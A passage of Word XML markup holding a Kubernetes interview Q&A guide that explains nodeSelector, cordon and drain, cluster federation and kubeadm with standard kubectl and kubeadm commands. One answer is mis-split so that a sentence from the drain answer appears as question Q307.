        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You label nodes with key-value pairs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. You define a nodeSelector in Pod spec</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. Scheduler only places Pod on matching nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 1: Label a node</w:t>
        <w:br/>
        <w:t>kubectl label nodes node-1 disktype=ssd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Use nodeSelector in Pod</w:t>
        <w:br/>
        <w:t>apiVersion: v1</w:t>
        <w:br/>
        <w:t>kind: Pod</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: my-app</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  containers:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  - name: app</w:t>
        <w:br/>
        <w:t xml:space="preserve">    image: nginx</w:t>
        <w:br/>
        <w:t xml:space="preserve">  nodeSelector:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    disktype: ssd</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What this means</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pod will ONLY run on nodes with:</w:t>
        <w:br/>
        <w:t>disktype=ssd</w:t>
        <w:br/>
        <w:t>If no such node exists:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pod stays in Pending state</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key characteristics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Very simple key-value matching</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hard constraint (must match)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No advanced logic (no OR, NOT, ranges)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node must have matching label</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>NodeSelector vs Node Affinity</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>NodeSelector</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node Affinity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Simple</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Advanced</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Logic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Exact match</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Flexible rules</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Operators</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Only =</w:t>
        <w:br/>
        <w:tab/>
        <w:t>In, NotIn, Exists</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Basic scheduling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Complex placement rules</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of hiring staff:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * NodeSelector = “Only hire people with Java skill = true”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No flexibility, strict filtering</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common real-world use cases</w:t>
        <w:br/>
        <w:t>1. Hardware-specific workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * GPU workloads → gpu=true</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * SSD storage → disk=ssd</w:t>
        <w:br/>
        <w:t>2. Environment separation</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * dev nodes → env=dev</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * prod nodes → env=prod</w:t>
        <w:br/>
        <w:t>3. Cost optimization</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * batch jobs → cheaper nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important behavior</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scheduler enforces nodeSelector strictly</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If no matching node exists → Pod will not run</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Works at scheduling time only (not runtime)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Very basic (no complex rules)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hard constraint (no fallback option)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Not suitable for advanced scheduling needs</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Best practices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Use consistent node labeling strategy</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Avoid over-restricting nodeSelector</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prefer node affinity for complex rules</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Combine with taints and tolerations for stronger control</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>NodeSelector in Kubernetes is a simple scheduling mechanism that binds Pods to nodes with matching labels using key-value equality rules, ensuring that workloads run only on specifically designated nodes based on hardware, environment, or organizational requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q306. What is cordon and drain?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: In Kubernetes, cordon and drain are node management operations used to safely control workload placement during maintenance, upgrades, or troubleshooting.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>🟡 1. Cordon</w:t>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Cordon marks a node as unschedulable, meaning no new Pods can be placed on it.</w:t>
        <w:br/>
        <w:t>Existing Pods are not affected.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens in cordon</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node is “tainted” as unschedulable</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scheduler stops placing new Pods on it</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Existing Pods continue running normally</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Command</w:t>
        <w:br/>
        <w:t>kubectl cordon node-1</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Preparing node for maintenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Preventing new workloads on a problematic node</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Controlling workload distribution</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a bus:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cordon = “No new passengers allowed to board”</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Existing passengers stay seated</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>🔴 2. Drain</w:t>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Drain safely evicts all Pods from a node and makes it empty for maintenance.</w:t>
        <w:br/>
        <w:t>Unlike cordon, it removes running workloads.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What happens in drain</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. Marks node unschedulable (like cordon)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. Evicts all Pods (except DaemonSets and some system Pods)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q307. Pods are recreated on other nodes by controllers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: 4. Node becomes empty</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Command</w:t>
        <w:br/>
        <w:t>kubectl drain node-1 --ignore-daemonsets --delete-emptydir-data</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Important flags</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * --ignore-daemonsets → skips DaemonSet-managed Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * --delete-emptydir-data → allows deletion of temporary data</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * --force → forces eviction (use carefully)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hardware maintenance</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Replacing nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster scaling down</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of a bus:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Drain = “All passengers must get off the bus and be moved to other buses”</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>⚖️ Cordon vs Drain</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cordon</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Drain</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Affects scheduling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Affects running Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Removes Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>No</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Yes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Use case</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prevent new Pods</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Prepare node for maintenance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Safety level</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low disruption</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High disruption (controlled)</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>🔄 How they work together</w:t>
        <w:br/>
        <w:t>Typical maintenance flow:</w:t>
        <w:br/>
        <w:t>1. kubectl cordon node</w:t>
        <w:br/>
        <w:t>2. kubectl drain node</w:t>
        <w:br/>
        <w:t>3. Perform maintenance</w:t>
        <w:br/>
        <w:t>4. kubectl uncordon node</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>🟢 Uncordon</w:t>
        <w:br/>
        <w:t>After maintenance:</w:t>
        <w:br/>
        <w:t>kubectl uncordon node-1</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node becomes schedulable again</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * New Pods can be placed</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>🧠 Key behavior summary</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cordon = stop new Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Drain = move existing Pods out safely</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Uncordon = allow scheduling again</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>🧪 Real-world usage</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kubernetes cluster upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node replacement in cloud</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Kernel patching</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Instance type change in cloud nodes</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>🎯 Interview-ready definition</w:t>
        <w:br/>
        <w:t>Cordon in Kubernetes marks a node as unschedulable so that no new Pods are assigned to it, while drain safely evicts all running Pods from the node (except DaemonSets) and reschedules them elsewhere, allowing controlled maintenance or upgrades without disrupting overall cluster availability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q308. Explain cluster federation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cluster Federation in Kubernetes is a concept used to manage multiple Kubernetes clusters as a single logical unit.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>Cluster federation lets you operate multiple clusters (across regions, clouds, or environments) as if they were one.</w:t>
        <w:br/>
        <w:t>Instead of managing each cluster separately, you centrally control:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * services</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * configurations</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why cluster federation is used</w:t>
        <w:br/>
        <w:t>It is mainly used for:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * High availability (HA) across regions</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Disaster recovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Global load balancing</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Multi-cloud deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Latency optimization (serve users from nearest region)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>How it works (high level)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         1. You have multiple Kubernetes clusters (e.g., US, Europe, Asia)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         2. A federation control plane manages them</w:t>
        <w:br/>
        <w:t xml:space="preserve">         3. You define a resource once (e.g., Deployment, Service)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         4. Federation propagates it to all selected clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         5. Traffic can be distributed across clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture overview</w:t>
        <w:br/>
        <w:t xml:space="preserve">               Federation Control Plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">                         |</w:t>
        <w:br/>
        <w:t xml:space="preserve">     -----------------------------------------</w:t>
        <w:br/>
        <w:t xml:space="preserve">     |                 |                    |</w:t>
        <w:br/>
        <w:t>Cluster A          Cluster B            Cluster C</w:t>
        <w:br/>
        <w:t xml:space="preserve"> (US)               (EU)                (Asia)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key components</w:t>
        <w:br/>
        <w:t>1. Federation control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Central management layer</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Distributes resources to member clusters</w:t>
        <w:br/>
        <w:t>2. Member clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Individual Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Run actual workloads</w:t>
        <w:br/>
        <w:t>3. Federated resources</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Federated Deployment</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Federated Service</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Federated ConfigMap</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What gets federated</w:t>
        <w:br/>
        <w:t>Depending on setup:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Namespaces</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Policies</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example use case</w:t>
        <w:br/>
        <w:t>Global application</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Users in India → Asia cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Users in US → US cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Users in EU → Europe cluster</w:t>
        <w:br/>
        <w:t>Federation ensures:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Same app version everywhere</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Consistent configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatic replication</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t>1. High availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * If one cluster fails → others continue serving traffic</w:t>
        <w:br/>
        <w:t>2. Disaster recovery</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Data/services replicated across regions</w:t>
        <w:br/>
        <w:t>3. Low latency</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Users served from nearest cluster</w:t>
        <w:br/>
        <w:t>4. Centralized management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * One control point for multiple clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Challenges / limitations</w:t>
        <w:br/>
        <w:t>1. Complexity</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hard to set up and manage</w:t>
        <w:br/>
        <w:t>2. Latency in sync</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Propagation between clusters is not instant</w:t>
        <w:br/>
        <w:t>3. Limited adoption</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Native federation (KubeFed) is not widely used today</w:t>
        <w:br/>
        <w:t>4. Debugging difficulty</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hard to trace issues across clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Modern alternatives</w:t>
        <w:br/>
        <w:t>Instead of federation, many organizations use:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * GitOps (ArgoCD, Flux)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Multi-cluster service mesh (Istio, Linkerd)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cloud provider multi-region solutions</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Each cluster = a data center branch</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Federation = headquarters that sends same instructions to all branches and ensures consistency</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>Cluster federation in Kubernetes is an architecture pattern that allows multiple Kubernetes clusters to be managed as a single logical system by a central control plane, enabling resource replication, high availability, and multi-region deployments while ensuring consistent configuration across clusters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q309. What is kubeadm?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: kubeadm is a tool used to bootstrap (initialize) a production-ready Kubernetes cluster in Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>kubeadm helps you quickly set up a Kubernetes cluster by automating control plane and worker node initialization.</w:t>
        <w:br/>
        <w:t>It does NOT install Kubernetes itself—it helps configure it correctly.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why kubeadm is used</w:t>
        <w:br/>
        <w:t>Before kubeadm:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Setting up Kubernetes was complex and manual</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You had to configure etcd, API server, scheduler, controller-manager yourself</w:t>
        <w:br/>
        <w:t>With kubeadm:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster setup becomes standardized and simple</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Faster production-grade installation</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kubeadm does</w:t>
        <w:br/>
        <w:t>1. Initializes control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Sets up:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-controller-manager</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Generates cluster certificates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Creates TLS certificates for secure communication</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Configures networking basics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Sets up cluster networking prerequisites</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Provides join command</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Gives token-based command for worker nodes to join cluster</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Basic workflow</w:t>
        <w:br/>
        <w:t>Step 1: Initialize control plane</w:t>
        <w:br/>
        <w:t>kubeadm init</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 2: Configure kubectl access</w:t>
        <w:br/>
        <w:t>mkdir -p $HOME/.kube</w:t>
        <w:br/>
        <w:t>cp /etc/kubernetes/admin.conf $HOME/.kube/config</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Step 3: Join worker nodes</w:t>
        <w:br/>
        <w:t>kubeadm join &lt;master-ip&gt;:6443 --token &lt;token&gt; --discovery-token-ca-cert-hash &lt;hash&gt;</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Architecture setup using kubeadm</w:t>
        <w:br/>
        <w:t>Control Plane Node</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── controller-manager</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Worker Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── kubelet</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── kube-proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └── Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>kubeadm vs kubectl vs kubelet</w:t>
        <w:br/>
        <w:t>Tool</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Purpose</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubeadm</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cluster setup tool</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubectl</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manage cluster resources</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubelet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Runs containers on nodes</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What kubeadm does NOT do</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Does NOT install OS dependencies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Does NOT manage networking plugins (you must install CNI like Calico, Flannel)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Does NOT provide cloud infrastructure</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of Kubernetes cluster setup like building a house:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubeadm = construction contractor who assembles structure</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubectl = remote control used by owner</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubelet = worker inside each room managing tasks</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Setting up on-prem Kubernetes clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Learning Kubernetes internals</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Production clusters without managed services (EKS/AKS/GKE)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hybrid environments</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Benefits</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Standardized cluster setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Production-ready configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Simplifies complex control plane setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Widely adopted tool</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Requires manual infrastructure setup</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Networking must be configured separately</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * More effort compared to managed Kubernetes (EKS, AKS, GKE)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>kubeadm is a Kubernetes bootstrap tool used to initialize and configure production-ready clusters by setting up the control plane components, generating certificates, and providing commands to join worker nodes, while leaving networking and infrastructure setup to the user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q310. Explain GKE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
